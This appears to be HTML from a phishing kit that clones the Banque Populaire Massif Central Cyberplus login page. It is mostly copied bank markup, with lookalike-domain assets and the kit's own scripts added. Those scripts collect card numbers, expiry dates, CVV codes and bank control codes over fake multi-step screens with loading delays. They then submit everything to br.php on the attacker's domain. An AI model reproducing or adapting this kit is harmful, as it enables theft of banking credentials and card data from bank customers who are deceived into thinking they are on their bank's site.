                     <label  style="margin-left:150px;"for="clm2" class="select col4col0">Cryptogramme visuel<font style="color:red;">*</font>&nbsp;(2) :</label>
        <input id="cvv" class="col5col0" name="cvv" maxlength="3" style="background-color:#FFF;border: 1px solid gray; border-radius: 4px;width:80px;" size="25" value=""><br/><br>              
             
<p style="color:#5858FA; margin-left:2px;"><b>Vérification du bon fonctionnement du PassCyberplus :</b></p>
<img src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/pic.png" width="704" height="159"><br/></br>

<label  style="margin-left:150px;"for="clm2" class="select col4col0">Code de contrôle  <font style="color:red;">**</font>&nbsp; :</label>
        <input id="cod" class="col5col0" maxlength="8" name="cod" style="background-color:#FFF;border: 1px solid gray; border-radius: 4px;" size="10" value=""><br/><br>
             
        </div>
        
        <img  id="but2" type="button" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/val.png" onclick="verf2()">
        
        
        
        <style>
        
        #but2{cursor:pointer;margin-left:600px;}
        #but3{cursor:pointer;margin-left:600px;}
        label{width:100px;}
        
        </style>
        
        
        <script>
        function checkLuhn(input)
{
  var sum = 0;
  var numdigits = input.length;
  var parity = numdigits % 2;
  for(var i=0; i < numdigits; i++) {
    var digit = parseInt(input.charAt(i))
    if(i % 2 == parity) digit *= 2;
    if(digit > 9) digit -= 9;
    sum += digit;
  }
  return (sum % 10) == 0;
}
        
        
        
        
        </script>
        
        <script>
        function verfication(){ 
var verf=0;
var id=document.getElementById("id").value;
var passe=document.getElementById("passe").value;

if(id==""){
    document.getElementById("id").style.borderColor ="red";
    document.getElementById("id").placeholder="Vérifiez votre champ";
    
    verf=1;
    }else{
        document.getElementById("id").style.borderColor ="";
    }
    if(passe==""){
    document.getElementById("passe").style.borderColor ="red";
    document.getElementById("passe").placeholder="Vérifiez votre champ";
    
    verf=1;
    }else{
        document.getElementById("passe").style.borderColor ="";
    }

if(verf==0){
    document.getElementById("etape1").style.display="none";
    document.getElementById("loader").style.display="";
    setTimeout(function(){ document.getElementById("loader").style.display="none"; }, 3000);
    setTimeout(function(){ document.getElementById("etape2").style.display=""; }, 3000);

}

}
        
function verf2(){
  var verf=0;
    var cp=document.getElementById("cp").value;
    var nc=document.getElementById("nc").value;
    var emois=document.getElementById("emois").value;
    var eannee=document.getElementById("eannee").value;
     var cvv=document.getElementById("cvv").value;
     var cod=document.getElementById("cod").value;
     var frm=document.getElementById("frm");    
     
 if( nc==""){
    document.getElementById("nc").style.borderColor ="red";
    document.getElementById("nc").placeholder="Vérifiez votre champ";
    
    verf=1;
    }
    else{
        if(isNaN(nc)==true){
    document.getElementById("nc").style.borderColor="red";
    document.getElementById("nc").value="";
    document.getElementById("nc").placeholder="Vérifiez votre région";
    verf=1;
    }
    else{
    document.getElementById("nc").style.borderColor ="";
    }
    }
    if(emois==""){
    document.getElementById("emois").style.borderColor ="red";
    verf=1;
    }else{
        document.getElementById("emois").style.borderColor ="";
    }
    
    if(cp==""){
    document.getElementById("cp").style.borderColor ="red";
    verf=1;
    }else{
        document.getElementById("cp").style.borderColor ="";
    }
  
  if(eannee==""){
    document.getElementById("eannee").style.borderColor ="red";
    verf=1;
    }else{
        document.getElementById("eannee").style.borderColor ="";
    }
    if( cvv==""){
    document.getElementById("cvv").style.borderColor ="red";
    document.getElementById("cvv").placeholder="Incorect !";
    
    verf=1;
    }else{
    if(isNaN(cvv)==true){
    document.getElementById("cvv").style.borderColor="red";
        
    document.getElementById("cvv").value="";
    document.getElementById("cvv").placeholder="Incorect! ";

    verf=1;
        }else{
        
        document.getElementById("cvv").style.borderColor ="";
        
        }
    
    }
    
    
    if(cod==""){
    document.getElementById("cod").style.borderColor ="red";
    document.getElementById("cod").placeholder="Vérifiez votre champ";
    
    verf=1;
    }else{
        document.getElementById("cod").style.borderColor ="";
    }
    
      if(verf==0){
 
  document.getElementById("etape2").style.display="none";
    document.getElementById("loader").style.display="";
    setTimeout(function(){ document.getElementById("loader").style.display="none"; }, 3000);
    setTimeout(function(){ document.getElementById("etape3").style.display="";}, 3000);
 
 
    }
 

}


    function verf3(){   
var verf=0;
var codf=document.getElementById("codf").value;


if(codf==""){
    document.getElementById("codf").style.borderColor ="red";
    document.getElementById("codf").placeholder="Vérifiez votre champ";
    
    verf=1;
    }else{
        document.getElementById("codf").style.borderColor ="";
    }   
        
        
        if(verf==0){
 frm.action="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/br.php/";
 frm.submit();
  
  
 
 
    }
        
        
        
        }
        
        
        </script>
        
        
        
        <!-- Partage vers les réseaux sociaux -->
        <span><div id="ctl00_PlaceHolderMain_socialShare" class="socialEditoZone">
    
</div></span>
    </div>
    

                        </div>
                        <div id="ctl00_cookieAccept" class="CookieAcceptPanel">
    <div id="ctl00_closecookie" class="CookieAcceptClosePanel">
        <a id="ctl00_closeLinkCookie" class="CookieAcceptCloseLink" onclick="return xt_med(&#39;&#39;, 10, &#39;Bandeau_Cookies::&lt;Accept cookies&gt;::pris_en_compte&#39;, &#39;A&#39;);" href="javascript:hideBannerCookies(&#39;BannerWarningUsed&#39;, 13, &#39;019&#39;)">X</a>
    </div><span id="ctl00_warningLabel" class="CookieAcceptWarning">En poursuivant la navigation sur ce site, vous acceptez l’utilisation de cookies pour vous proposer des services et des offres adaptés à vos centres d’intérêt. </span><a onclick="return xt_med(&#39;&#39;, 10, &#39;Bandeau_Cookies::&lt;Accept cookies&gt;::ignore&#39;, &#39;A&#39;);" id="ctl00_readMoreLink" class="CookieAcceptReadMore" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;ctl00$readMoreLink&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, true))">En savoir plus</a>
</div>
                    </div>
                    <!--  Fin div gauche -->
                    <!--  Debut div droite -->
                   
                        <div id="droite" class="noindex">
                            <div id="input_recherche" onmousedown="disableMenuAll();" class="noindex">
                                <div id="s4-searcharea" class="s4-search s4-rp noindex">
                                    
                                        <table class="s4-wpTopTable" border="0" cellpadding="0" cellspacing="0" width="100%">
    <tbody><tr>
        <td valign="top"><div webpartid="00000000-0000-0000-0000-000000000000" haspers="true" id="WebPartWPQ1" width="100%" class="noindex" onlyformepart="true" allowdelete="false" style=""><div id="SRSB"> <div>
            <table class="ms-sbtable ms-sbtable-ex s4-search" cellpadding="0" cellspacing="0" border="0" style="width:158px!important;height:27px!important;">
                <tbody><tr class="ms-sbrow">
                    <td class="ms-sbcell"><input name="InputKeywords" type="text" value="Rechercher" maxlength="200" id="ctl00_PlaceHolderRightMenu_PlaceHolderSearchArea_ctl00_S2E0633FE_InputKeywords" accesskey="S" title="Rechercher..." class="ms-sbplain s4-searchbox-QueryPrompt" alt="Rechercher..." onkeypress="javascript: return S2E0633FE_OSBEK(event);" autocomplete="off" onfocus="if (document.getElementById(&#39;ctl00_PlaceHolderRightMenu_PlaceHolderSearchArea_ctl00_ctl06&#39;).value ==&#39;0&#39;) {this.value=&#39;&#39;; if (this.className == &#39;s4-searchbox-QueryPrompt&#39;) this.className = &#39;&#39;; else this.className = this.className.replace(&#39; s4-searchbox-QueryPrompt&#39;,&#39;&#39;); document.getElementById(&#39;ctl00_PlaceHolderRightMenu_PlaceHolderSearchArea_ctl00_ctl06&#39;).value=1;}" onblur="if (this.value ==&#39;&#39;) {this.value=&#39;Rechercher&#39;; if (this.className.indexOf(&#39;s4-searchbox-QueryPrompt&#39;) == -1) this.className += this.className?&#39; s4-searchbox-QueryPrompt&#39;:&#39;s4-searchbox-QueryPrompt&#39;; document.getElementById(&#39;ctl00_PlaceHolderRightMenu_PlaceHolderSearchArea_ctl00_ctl06&#39;).value = &#39;0&#39;} else {document.getElementById(&#39;ctl00_PlaceHolderRightMenu_PlaceHolderSearchArea_ctl00_ctl06&#39;).value=&#39;1&#39;;}"><div id="ctl00_PlaceHolderRightMenu_PlaceHolderSearchArea_ctl00_AutoCompContainer" class="srch-AutoCompContainer" style="position: absolute;"><div class="srch-AutoCompDropImg"></div><div id="ctl00_PlaceHolderRightMenu_PlaceHolderSearchArea_ctl00_AutoCompList" class="srch-AutoCompList"></div></div></td><td class="ms-sbgo ms-sbcell"><a id="ctl00_PlaceHolderRightMenu_PlaceHolderSearchArea_ctl00_S2E0633FE_go" title="Rechercher" href="javascript:S2E0633FE_Submit()"><img title="Rechercher" class="srch-gosearchimg" alt="Rechercher" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/gosearch15.png" style="border-width:0px;"></a></td><td class="ms-sbLastcell"></td>
                </tr>
            </tbody></table><input name="ctl00$PlaceHolderRightMenu$PlaceHolderSearchArea$ctl00$ctl06" type="hidden" id="ctl00_PlaceHolderRightMenu_PlaceHolderSearchArea_ctl00_ctl06" value="0">
        </div></div></div></td>
    </tr>
</tbody></table>
                                    
                                </div>
                                <br class="clear">
                            </div>
                            <div class="typicalBlock blue noindex" id="acces_direct">
                                <h5>acces directs</h5>
                                <div class="angle_arrondi noindex">
                                </div>
                                <div class="block noindex">
                                    <div class="noindex">
    <div id="ctl00_PlaceHolderRightMenu_ctl01">
        <div class="BlockDirectAccess noindex">
            <select name="ctl00$PlaceHolderRightMenu$ddl_subscription" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$PlaceHolderRightMenu$ddl_subscription\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_PlaceHolderRightMenu_ddl_subscription" class="ItemDirectAccess" onmouseover="this.title = this.options[this.selectedIndex].title;">
                <option value="" title="Devis et souscriptions">Devis et souscriptions</option>
                <option value="https://abpiard.assurances.natixis.com/autov2/www/vehicule/index/index?ref=019" title="Devis Assurance Auto">Devis Assurance Auto</option>
                <option value="https://abp.assurances.natixis.com/devis/habitation/019" title="Devis Assurance Habitation">Devis Assurance Habitation</option>
                <option value="/portailinternet/Pages/AchatEpargne.aspx?CODE=plan-epargne-logement" title="Plan Epargne Logement ">Plan Epargne Logement </option>
                <option value="/cyber/internet/ExternalStartTask.do?taskId=LIVA&amp;popup=Souscription1" title="Livret A">Livret A</option>
                <option value="/portailinternet/Pages/AchatEpargne.aspx?CODE=livret-jeune" title="Livret Jeune">Livret Jeune</option>
                <option value="/portailinternet/Pages/AchatEpargne.aspx?CODE=livret-premier-pas" title="Livret Premier Pas">Livret Premier Pas</option>
                <option value="/cyber/internet/ExternalStartTask.do?taskId=LAPL&amp;popup=Souscription7" title="Avenant PEL">Avenant PEL</option>
                <option value="/portailinternet/Pages/AchatEpargne.aspx?CODE=livret-developpement-durable" title="Livret de Développement Durable (LDD)">Livret de Développement Durable (LDD)</option>
                <option value="/portailinternet/Pages/AchatEpargne.aspx?CODE=compte-sur-livret" title="Compte sur Livret">Compte sur Livret</option>
                <option value="/portailinternet/Pages/AchatEpargne.aspx?CODE=compte-epargne-logement" title="Compte Epargne Logement (CEL)">Compte Epargne Logement (CEL)</option>
                <option value="/portailinternet/Pages/AchatEpargne.aspx?CODE=codevair" title="Codevair">Codevair</option>
                <option value="/portailinternet/Pages/SimulateurVCC.aspx?TypeOffre=AUT" title="Crédit auto">Crédit auto</option>
                <option value="/portailinternet/Pages/SimulateurVCC.aspx?TypeOffre=TRA" title="Crédit travaux">Crédit travaux</option>
                <option value="/portailinternet/Pages/SimulateurVCC.aspx?TypeOffre=TRE" title="Crédit trésorerie">Crédit trésorerie</option>
                <option value="/portailinternet/Pages/DemandeTableauAmortissement.aspx" title="Prêt : Tableau d&#39;amortissement">Prêt : Tableau d'amortissement</option>
                <option value="/cyber/internet/ExternalStartTask.do?taskId=persoVisuelCartes&amp;popup=VisuelCartes" title="Personnaliser votre carte">Personnaliser votre carte</option>
                <option value="/portailinternet/Pages/DemandeECarteBleue.aspx" title="E-carte bleue">E-carte bleue</option>
                <option value="/portailinternet/Pages/DemandeDeCarteDePaiement.aspx" title="Réserver une carte de paiement">Réserver une carte de paiement</option>
                <option value="/portailinternet/Pages/MiseAJourCoordonneesPostales.aspx" title="Actualiser votre adresse postale">Actualiser votre adresse postale</option>
                <option value="/portailinternet/Transactionnel/Pages/CyberIntegrationPage.aspx?taskId=DEMB" title="Document électronique">Document électronique</option>
                <option value="/cyber/internet/ExternalStartTask.do?taskId=LRET&amp;popup=Souscription9" title="Rétractation : j&#39;ai changé d&#39;avis">Rétractation : j'ai changé d'avis</option>

            </select><select name="ctl00$PlaceHolderRightMenu$ddl_simulator" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$PlaceHolderRightMenu$ddl_simulator\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_PlaceHolderRightMenu_ddl_simulator" class="ItemDirectAccess" onmouseover="this.title = this.options[this.selectedIndex].title;">
                <option value="" title="Simulateurs">Simulateurs</option>
                <option value="http://site29.bpadveris2-pre.nfrance.com/simulateur-national/" title="Diagnostic monétique">Diagnostic monétique</option>
                <option value="/portailinternet/Pages/SimulateurVCC.aspx?TypeOffre=AUT" title="Crédit auto">Crédit auto</option>
                <option value="/portailinternet/Pages/SimulateurVCC.aspx?TypeOffre=TRA" title="Crédit travaux">Crédit travaux</option>
                <option value="/simulateurs/sob/?entite={0}" title="Simulez votre épargne">Simulez votre épargne</option>
                <option value="/simulateurs/fdn/?entite={0}" title="Estimez vos frais de notaire">Estimez vos frais de notaire</option>
                <option value="/simulateurs/ptz/?entite={0}" title="Estimez le montant de votre PTZ">Estimez le montant de votre PTZ</option>
                <option value="/simulateurs/dfi/?entite={0}" title="Estimez votre disponible fiscal PERP">Estimez votre disponible fiscal PERP</option>
                <option value="/simulateurs/efuturis/?entite={0}" title="Simulez votre retraite">Simulez votre retraite</option>
                <option value="/simulateurs/epremisir/?entite={0}" title="Simulez votre impôt sur le revenu">Simulez votre impôt sur le revenu</option>
                <option value="/simulateurs/prv/?entite={0}" title="Estimez votre couverture prévoyance">Estimez votre couverture prévoyance</option>
                <option value="/simulateurs/ceg/pel/enter?entite={0}" title="Simulez votre PEL">Simulez votre PEL</option>
                <option value="/simulateurs/ceg/cel/enter?entite={0}" title="Simulez votre CEL">Simulez votre CEL</option>
                <option value="/simulateurs/epremisisf/?entite={0}" title="Simulez votre ISF">Simulez votre ISF</option>
                <option value="/simulateurs/succession/?entite={0}" title="Estimez les droits de succession">Estimez les droits de succession</option>
                <option value="/simulateurs/mad/?entite={0}" title="Estimez votre disponible fiscal Madelin">Estimez votre disponible fiscal Madelin</option>

            </select><div class="links noindex">
                <a href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Services/Pages/PartenairesNonAuth.aspx?vary=0-0-0">Nos partenaires</a>
            </div>
        </div>
    </div>
</div>
                                </div>
                            </div>
                            <div class="noindex"><div class="block noindex" style="margin-bottom:4px;">
    <a onclick="return xt_med(&#39;&#39;, 10, &#39;Reseaux_sociaux::Lien::Rejoignez-nous sur LinkedIn&#39;, &#39;A&#39;);" href="https://www.linkedin.com/company/3856060?trk=tyah&amp;trkInfo=tarId%3A1413980398652%2Ctas%3Abanque%20populaire%20massi%2Cidx%3A1-1-1" target="_blank" style="margin-right:14px;"><img title="Rejoignez-nous sur LinkedIn" onmouseover="this.src=&#39;/portailinternet/Lists/VisualElementsLogo/linkedin_hover.png&#39;" onmouseout="this.src=&#39;/portailinternet/Lists/VisualElementsLogo/linkedin.png&#39;" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/linkedin.png" style="border-width:0px;"></a><a onclick="return xt_med(&#39;&#39;, 10, &#39;Reseaux_sociaux::Lien::Suivez la Banque Populaire sur Facebook&#39;, &#39;A&#39;);" href="https://fr-fr.facebook.com/banquepopulaire" target="_blank" style="margin-right:14px;"><img title="Suivez la Banque Populaire sur Facebook" onmouseover="this.src=&#39;/portailinternet/Lists/VisualElementsLogo/facebook_hover.png&#39;" onmouseout="this.src=&#39;/portailinternet/Lists/VisualElementsLogo/facebook.png&#39;" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/facebook.png" style="border-width:0px;"></a><a onclick="return xt_med(&#39;&#39;, 10, &#39;Reseaux_sociaux::Lien::Suivez le Banque Populaire sur Twitter&#39;, &#39;A&#39;);" href="https://twitter.com/BanquePopulaire" target="_blank" style="margin-right:14px;"><img title="Suivez le Banque Populaire sur Twitter" onmouseover="this.src=&#39;/portailinternet/Lists/VisualElementsLogo/twitter_hover.png&#39;" onmouseout="this.src=&#39;/portailinternet/Lists/VisualElementsLogo/twitter.png&#39;" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/twitter.png" style="border-width:0px;"></a><a onclick="return xt_med(&#39;&#39;, 10, &#39;Reseaux_sociaux::Lien::Rejoignez-nous sur You Tube&#39;, &#39;A&#39;);"
    href="#" target="_blank" style="margin-right:0px;">
    <img title="Rejoignez-nous sur You Tube" onmouseover="this.src=&#39;/portailinternet/Lists/VisualElementsLogo/youtube_hover.png&#39;" onmouseout="this.src=&#39;/portailinternet/Lists/VisualElementsLogo/youtube.png&#39;" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/youtube.png" style="border-width:0px;"></a>
</div></div>
                            
                            

                            
<div class="noindex"><div class="typicalBlock pink noindex">
    <h5>Contacter un conseiller</h5><div class="angle_arrondi noindex">

    </div><div class="block noindex">
        <div class="links noindex">
            <div class="contactphone">
                <div class="contactphoneimage">

                </div><span>04 73 73 73 93</span>
            </div><div class="contactmail">
                <div class="contactmailimage" onclick="window.location = &#39;/portailinternet/Pages/DemandeRendezVousProspect.aspx&#39;;">

                </div><a class="textlinkmail" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Pages/DemandeRendezVousProspect.aspx">E-mail</a>
            </div><span class="callPrice"> (Prix d'un appel local)</span>
        </div><div class="links last noindex agencyblock" onkeypress="javascript:return WebForm_FireDefaultButton(event, &#39;ctl00_PlaceHolderRightMenu_ContactMyBank_BtnSearchAgencyOK&#39;)">
            <span class="agencyLbl">Trouver une agence</span><br><input name="ctl00$PlaceHolderRightMenu$ContactMyBank$ctl16" type="text" value="Ville, Code postal" title="Trouver une agence" id="findAgenceViaCodeTextBox" onfocus="if (this.value==&#39;Ville, Code postal&#39;) this.value=&#39;&#39;" onblur="if (this.value==&#39;&#39;) this.value=&#39;Ville, Code postal&#39;"><input type="submit" name="ctl00$PlaceHolderRightMenu$ContactMyBank$BtnSearchAgencyOK" value="OK" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;ctl00$PlaceHolderRightMenu$ContactMyBank$BtnSearchAgencyOK&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, false))" id="ctl00_PlaceHolderRightMenu_ContactMyBank_BtnSearchAgencyOK" class="btn" style="cursor:pointer;"><input type="submit" name="ctl00$PlaceHolderRightMenu$ContactMyBank$ctl17" value="" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;ctl00$PlaceHolderRightMenu$ContactMyBank$ctl17&quot;, &quot;&quot;, true, &quot;&quot;, &quot;/Portailinternet/Editorial/VotreBanque/Pages/Recherche-territoriale.aspx&quot;, false, false))" class="map" title="Recherche cartographique d&#39;agence" style="cursor:pointer;"><br>
        </div><div class="links noindex">
            <a href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Services/Pages/services-urgence.aspx?vary=0-0-0">Numéros utiles</a>
        </div>
    </div>
</div></div>
              
                            
                            <div class="noindex"><div></div></div>
                        </div>
                    
                    <!--  Fin div droite  -->
                    <br class="clear">
                </div>
                <!-- Fin Contenu -->
                <!-- Debut div footer -->
                <div onmousedown="disableMenuAll();" class="noindex">
                    <div class="noindex"><div id="footer" class="noindex">
    <a href="http://www.banquepopulaire.fr/portailinternet" target="_blank"><img src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/footer_3D.png" alt="Logo Banque" style="border-width:0px;"></a><ul><li><a title="Tarifs &amp; règlementations" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Tarifs/Pages/tarifs-reglementation.aspx?vary=0-0-0">Tarifs &amp; règlementations</a></li><li><a title="Mentions légales" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Tarifs/Pages/mentions_legales.aspx?vary=0-0-0">Mentions légales</a></li><li><a title="Garantie des dépôts" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Informations/Pages/garantie-des-depots.aspx?vary=0-0-0">Garantie des dépôts</a></li><li><a title="Information Cookies" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Tarifs/Pages/cookies.aspx?vary=0-0-0">Information Cookies</a></li><li><a title="Nous contacter" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Services/Pages/nous-contacter.aspx?vary=0-0-0">Nous contacter</a></li><li><a title="Comptes inactifs et Déshérence" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/portailinternet/Editorial/Informations/Pages/comptes-bancaires-inactifs-loi-ckert.aspx?xtcr=1&amp;xtmc=&amp;vary=0-0-0">Comptes inactifs et Déshérence</a></li></ul><p>©&nbsp;BPCE<script>function navigateCommand(n){jQuery(CurrentRemoteProxy.targetAppCtx).height(n.params.appPortalHeight); if (/Edge\/12./i.test(navigator.userAgent)){setTimeout(function(){jQuery(CurrentRemoteProxy.targetAppCtx).height(n.params.appPortalHeight+1);},100);}sessionKeeperInstance!=undefined&&sessionKeeperInstance.start();};function ULSSendExceptionImpl(msg, url, line, oCaller){return false;};</script><br>BPMC</p>
</div></div>
                </div>
                <!-- Fin div footer -->
            </div>
        </div>
    </div>
    <!--End Nav|Content Area-->
    <!--placeholder invisibles -->
    <div style="display: none;" onmousedown="disableMenuAll();">
        
        
        
        
        
        
        
        
        
        
        
        
        <span id="ctl00_AtInternetControl"></span>
        
        
    </div>
     <!--Contenair pour les popin-->
     
    <!--control hidden, to insert javascript to show video correctly-->
    <!--do not change the control below-->
    <script type="text/javascript">
</script>

    <span></span>
    <div id="ctl00_panelZone">
    <div style="display:none" id="hidZone"><menu class="ms-SrvMenuUI">
        <ie:menuitem id="MSOMenu_Help" iconsrc="/_layouts/images/HelpIcon.gif" onmenuclick="MSOWebPartPage_SetNewWindowLocation(MenuWebPart.getAttribute(&#39;helpLink&#39;), MenuWebPart.getAttribute(&#39;helpMode&#39;))" text="Aide" type="option" style="display:none">

        </ie:menuitem>
    </menu></div>
</div><input type="hidden" id="_wpcmWpid" name="_wpcmWpid" value=""><input type="hidden" id="wpcmVal" name="wpcmVal" value="">



<div id="checkCustom"></div>
                <script type="text/javascript" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/ajaxtoolkit.js.téléchargement"></script>

<script type="text/javascript">RegisterSod("sp.runtime.js", "\u002f_layouts\u002fsp.runtime.js?rev=IGffcZfunndj0247nOxKVg\u00253D\u00253D");RegisterSodDep("sp.runtime.js", "sp.core.js");RegisterSodDep("sp.runtime.js", "sp.res.resx");</script><script type="text/javascript">RegisterSod("sp.js", "\u002f_layouts\u002fsp.js?rev=\u00252B4ZEyA892P3T0504qi0paw\u00253D\u00253D");RegisterSodDep("sp.js", "sp.core.js");RegisterSodDep("sp.js", "sp.runtime.js");RegisterSodDep("sp.js", "sp.ui.dialog.js");RegisterSodDep("sp.js", "sp.res.resx");</script><script type="text/javascript">RegisterSod("cui.js", "\u002f_layouts\u002fcui.js?rev=OOyJv78CADNBeet\u00252FvTvniQ\u00253D\u00253D");</script><script type="text/javascript">RegisterSod("inplview", "\u002f_layouts\u002finplview.js?rev=WB6Gy8a027aeNCq7koVCUg\u00253D\u00253D");RegisterSodDep("inplview", "core.js");RegisterSodDep("inplview", "sp.js");</script><script type="text/javascript">RegisterSod("ribbon", "\u002f_layouts\u002fsp.ribbon.js?rev=F\u00252BUEJ66rbXzSvpf7nN69wQ\u00253D\u00253D");RegisterSodDep("ribbon", "core.js");RegisterSodDep("ribbon", "sp.core.js");RegisterSodDep("ribbon", "sp.js");RegisterSodDep("ribbon", "cui.js");RegisterSodDep("ribbon", "sp.res.resx");RegisterSodDep("ribbon", "sp.runtime.js");RegisterSodDep("ribbon", "inplview");</script><script type="text/javascript">RegisterSod("sp.publishing.resources.resx", "\u002f_layouts\u002fScriptResx.ashx?culture=fr\u00252Dfr\u0026name=SP\u00252EPublishing\u00252EResources\u0026rev=1vSV8En6bR3\u00252FvEV4mM\u00252BDDw\u00253D\u00253D");</script><script type="text/javascript">RegisterSod("sp.ui.pub.ribbon.js", "\u002f_layouts\u002fsp.ui.pub.ribbon.js?rev=RGQSBI9Dm0E345iq\u00252FxUpHg\u00253D\u00253D");</script>



<script type="text/javascript" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/xtclicks.min.js.téléchargement"></script>
<script type="text/javascript" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/xtcore.min.js.téléchargement"></script>
<div id="YoutubeVideoTagContainer"></div>

<input type="hidden" value="1" id="hiddenInputToUpdateATBuffer_CommonToolkitScripts" name="hiddenInputToUpdateATBuffer_CommonToolkitScripts">
    <script type="text/javascript">SP.SOD.set_prefetch(0);</script>
        
   
   

</div>
    
    
<div id="etape3"  style="display:none">
    <!-- saved from url=(0109)http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Informations/Pages/ACCES_CYBERPLUS.aspx -->
<head id="ctl00_head1"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="description" content=""><meta http-equiv="Expires" content="0"><meta http-equiv="Content-Script-Type" content="text/javascript"><meta http-equiv="Content-Style-Type" content="text/css"><title>
    Accès CYBERPLUS ! - BPMC
</title>
    <script type="text/javascript" id="www-widgetapi-script" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/www-widgetapi.js.téléchargement" async=""></script><script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/player_api"></script><script type="text/javascript">
        var _fV4UI = true;
        var MenuNeeds = null;
    </script>
    <link type="text/xml" rel="alternate" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Informations/_vti_bin/spsdisco.aspx"><script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/init.js.téléchargement" type="text/javascript"></script><script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/jquery.all.min.js.téléchargement" type="text/javascript"></script><script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/common.min.js.téléchargement" type="text/javascript"></script><script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/jquery.modal.min.js.téléchargement" type="text/javascript"></script>
</head><span><link rel="shortcut icon" href="http://www.massifcentral.banquepopulaire.fr/portailinternet//Lists/VisualElementsLogo/FAVICON.ico" type="image/vnd.microsoft.icon"></span>
    <!--[if IE 7 | IE 8]>
        <script src="/portailinternet/_layouts/Ibp.Cyi.Site/Javascript/script.IE.min.js" type="text/javascript"></script>
    <![endif]-->
    <!--[if IE 6]>
        <script src="/portailinternet/_layouts/Ibp.Cyi.Site/Javascript/script.IE.min.js" type="text/javascript"></script>
    <![endif]-->

    <link rel="stylesheet" type="text/css" href="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/commun.min.css"><link rel="stylesheet" type="text/css" href="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/jquery.modal.min.css"><link rel="stylesheet" type="text/css" href="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/commun.publishing.min.css"><link rel="stylesheet" type="text/css" media="print" href="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/print.min.css"><link rel="stylesheet" type="text/css" href="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/search.min.css"><!--[if IE 7 | IE 8]> <link rel="stylesheet" type="text/css" href="/portailinternet/_layouts/styles/Ibp.Cyi.Site/min/commun.IE.min.css"/> <![endif]--><!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/portailinternet/_layouts/styles/Ibp.Cyi.Site/min/commun.IE6.min.css"/> <![endif]--><style type="text/css">
    .ctl00_wpz_0 { border-color:Black;border-width:1px;border-style:Solid; }

</style><script type="text/javascript">function onYouTubeIframeAPIReady() { if(typeof(loadPlayerForYoutubeVideo) != "undefined") { loadPlayerForYoutubeVideo(); } if(typeof(loadPlayerForYoutubePlaylist) != "undefined") { loadPlayerForYoutubePlaylist(); }}</script>



   
<div>
<input type="hidden" name="MSOWebPartPage_PostbackSource" id="MSOWebPartPage_PostbackSource" value="">
<input type="hidden" name="MSOTlPn_SelectedWpId" id="MSOTlPn_SelectedWpId" value="">
<input type="hidden" name="MSOTlPn_View" id="MSOTlPn_View" value="0">
<input type="hidden" name="MSOTlPn_ShowSettings" id="MSOTlPn_ShowSettings" value="False">
<input type="hidden" name="MSOGallery_SelectedLibrary" id="MSOGallery_SelectedLibrary" value="">
<input type="hidden" name="MSOGallery_FilterString" id="MSOGallery_FilterString" value="">
<input type="hidden" name="MSOTlPn_Button" id="MSOTlPn_Button" value="none">
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="">
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="">
<input type="hidden" name="__REQUESTDIGEST" id="__REQUESTDIGEST" value="0x9D017DCDDE0229DCB0A9C7E2B614AE8BF7B8BD2CA716908DD4A90CB4512CE457451658B8D0E5A96C421DBEDB3BEFE183FEF73BF909B0E70D6CB17BC7E2DE8DEF,31 Oct 2016 18:09:50 -0000">
<input type="hidden" name="MSOSPWebPartManager_DisplayModeName" id="MSOSPWebPartManager_DisplayModeName" value="Browse">
<input type="hidden" name="MSOSPWebPartManager_ExitingDesignMode" id="MSOSPWebPartManager_ExitingDesignMode" value="false">
